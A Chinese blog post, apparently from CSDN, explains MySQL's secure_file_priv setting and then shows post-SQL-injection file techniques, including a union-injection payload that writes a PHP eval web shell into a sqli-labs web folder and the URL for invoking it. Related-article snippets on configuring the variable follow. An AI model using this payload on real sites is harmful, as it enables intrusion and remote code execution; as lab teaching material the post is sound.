Mysql 中的secure_file_priv参数设置

已于 2024-05-20 14:47:53 修改
阅读量4.3k 收藏 5
点赞数 14
文章标签: mysql 数据库
于 2024-05-20 14:42:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42515203/article/details/138975033
版权

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。

修改完参数之后,必须重启数据库才能生效。

启动MySQL,先查看secure_file_priv的值。

命令:show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路径;

内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;

dumpfile只能写一行,并且输出中不存在任何格式。

2.select  *** into outfile  文件路径;

内容有特殊格式转换,该换行换行,较比dumpfile更加好用;

outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。

例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

调用:url/test.php?123=phpinfo();

3.select  *** load_file (下载文件)

select  load_file(文件路径);

数字兴
关注
MYSQL数据导出与导入,secure_file_priv参数设置
清平乐的技术专栏
07-17 8066
一、secure_file_priv参数说明 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。 如果这个参数没有设置,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它; 如果这个参数为NULL,MySQL服务会禁止导入和导出操作。 二、查看参数 进入MySQL数据库,执行命令:
【phpMyadmin】MYSQL突破secure_file_priv写shell提权
失心少年
09-19 1450
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
修改secure-file-priv参数-mysql5.7.26限制不允许导入或导出的解决方法
最新发布
2301_76596810的博客
03-10 642
本人是在sql注入的文件上传拿web shel 时所用到的写入文件权限遇到文件上传不成功的问题,记住修改后,重启mysql才生效,最后可以查看验证一下。
数据库出现secure-file-priv=““修改不成功,用户权限不够的解决方案
m0_75112012的博客
09-23 732
2、看下面User权限 --- 观察修改,写入,读取和执行这几个权限是否被允许,若不允许,把它改成允许,然后点击确定。1 、右键点击my.ini文件属性,选择安全--点用户----看下面的权限。3、接下来尝试secure-file-priv=""修改完后,看能不能保存。
mysql配置secure_file_priv
jkzyx123的博客
09-06 8981
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。
mysql中如何修改secure_file_priv值???百分百灵验!!
2301_77578012的博客
05-16 2882
win+r->services.msc->找到mysql服务右键重启。如果文件中有此参数则直接修改,没有则添加。直接打开控制面板点击重启。
MySQL 全局配置 --secure-file-priv
热门推荐
zaihukeji的博客
08-20 2万+
一则问题 在执行导出INFORMATION_SCHEMA.OPTIMIZER_TRACE内容到本地文件时: SELECT TRACE INTO DUMPFILE "optimizer_trace.txt" FROM INFORMATION_SCHEMA.OPTIMIZER_TRACE; 报错提示如下: (1290, 'The MySQL server is running with the --secure-file-priv option so it cannot execute this..
MySQL使用LOAD DATA INFILE命令导入数据、配置secure_file_priv、解决ERROR 1290 (HY000)错误
terence的博客
06-21 2502
在执行导入操作之前,请确保数据文件的路径和名称正确,并且在MySQL服务器上是可访问的。确保目录路径是正确的,并且MySQL服务器的操作系统用户具有对该目录的读取权限。在重新配置MySQL服务器后,重新连接到MySQL命令行终端,并再次尝试执行。执行适当的命令以重启MySQL服务器,以使配置更改生效。命令,并将数据文件导入到MySQL数据库的目标表中。在MySQL命令行终端中执行以下命令,以查看。用于忽略数据文件的第一行,通常是字段名行。为数据文件的实际路径和文件名。,则表示该选项未配置。
Windows下MySQL8.0中secure_file_priv为NULL解决办法
12-14
后来想导出数据库里面的一些数据,提示我secure_file_priv=null,报错,后来网上找了很多方法,说只需要在my.ini里面加一行secure_file_priv=””(或者是你自己想要的路径,如”D:/MySQL”),然后重启mysql (用...
MySQL导出数据遇到secure-file-priv问题的解决方法
09-09
MySQL数据库操作中,有时我们在尝试导出数据时可能会遇到一个错误提示:“ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement.” 这个...
mysqlsecure_file_priv进行数据导出导入
嘻嘻哈哈
12-04 490
一、导出导入数据库需要开启secure_file_priv 1.查看是否开启 使用命令行,输入以下命令。查看secure_file_priv属性,如果有路径值则为开启 showglobalvariableslike'%secure%'; 2.未配置进行配置 进入mysql的安装目录,找到my.ini(windows系统)/my.cnf(Linux系统),在[mysqld]内添加如下配置 secure_file_priv="D:/Program Files/MySQL/tmp"...
闲话mysql-5.7.18-winx64的secure_file_priv配置项
打酱油的葫芦娃
04-24 1万+
由于最近的项目需要用到比较轻量级的数据库,一下子就想到了MySQL,寻思就装上先摸索一下。 我的安装环境:Windows 10系统 安装包:mysql-5.7.18-winx64 安装包为当前最新版本,安装过程在以前的基础上做了些变动,这里我参考了博客:MySQL v5.7.18 版本解压安装 安装过程,在初始化数据库这一步的时候,教程给的命令行为: mysqld --initialize-insecure
windows mysql8 导出文件secure-file-priv 配置
csdn_aspnet的专栏,请点击博客主页右上角三个点中的私信联系
05-12 665
大概意思:MySQL 服务器正在使用–secure-file-priv 选项运行,因此无法执行此语句。
mysql safe file priv_MYSQLsecure_file_priv参数怎么用?
weixin_34178408的博客
01-27 855
MYSQLsecure_file_priv参数怎么用?发布时间:2020-06-01 14:03:22来源:亿速云阅读:639作者:LeahMYSQLsecure_file_priv参数怎么用?针对这个问题,今天小编总结这篇有关secure_file_priv的文章,希望能帮助朋友了解secure_file_priv这个新特性。secure-file-priv特性secure-file-pri...
Mysql - -导出数据之全局变量secure_file_priv
Kevin's Blog
04-30 1257
文章目录一、目的二、举例三、介绍secure_file_priv四、修改secure_file_priv值可导出4.1 测试可否导入导出4.2 修改其值方法 关于整理提权时,使用到的secure_file_priv函数的一个Mysql基础知识总结 一、目的 了解mysql全局变量:secure_file_priv 将msyql数据库中的数据导入到本地(对secure_file_priv全局变...
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot exec
qq_41904572的博客
03-12 1241
linux环境中修改mysqlsecure_file_priv值 ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot exec
修改mysqlsecure_file_priv的配置路径
12-07
要修改MySQL中`secure_file_priv`的配置路径,可以通过修改MySQL的配置文件来实现。以下是具体步骤: 1. **找到MySQL配置文件**: - 在Windows系统中,配置文件通常是`my.ini`。 - 在Linux或macOS系统中,配置文件通常是`my.cnf`。 2. **编辑配置文件**: - 使用文本编辑器打开配置文件。 - 找到`[mysqld]`部分。 - 添加或修改`secure_file_priv`参数,指定你想要的路径。例如: ```ini [mysqld] secure_file_priv = /var/lib/mysql-files/ ``` 3. **保存配置文件**: - 保存并关闭配置文件。 4. **重启MySQL服务**: - 在Windows系统中,可以通过服务管理器重启MySQL服务。 - 在Linux或macOS系统中,可以使用以下命令重启MySQL服务: ```sh sudo service mysql restart ``` 或者 ```sh sudo systemctl restart mysql ``` 5. **验证修改**: - 登录MySQL命令行界面: ```sh mysql -u root -p ``` - 执行以下命令查看`secure_file_priv`的值: ```sql SHOW VARIABLES LIKE "secure_file_priv"; ``` 这样,`secure_file_priv`的路径就被修改为你指定的路径了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值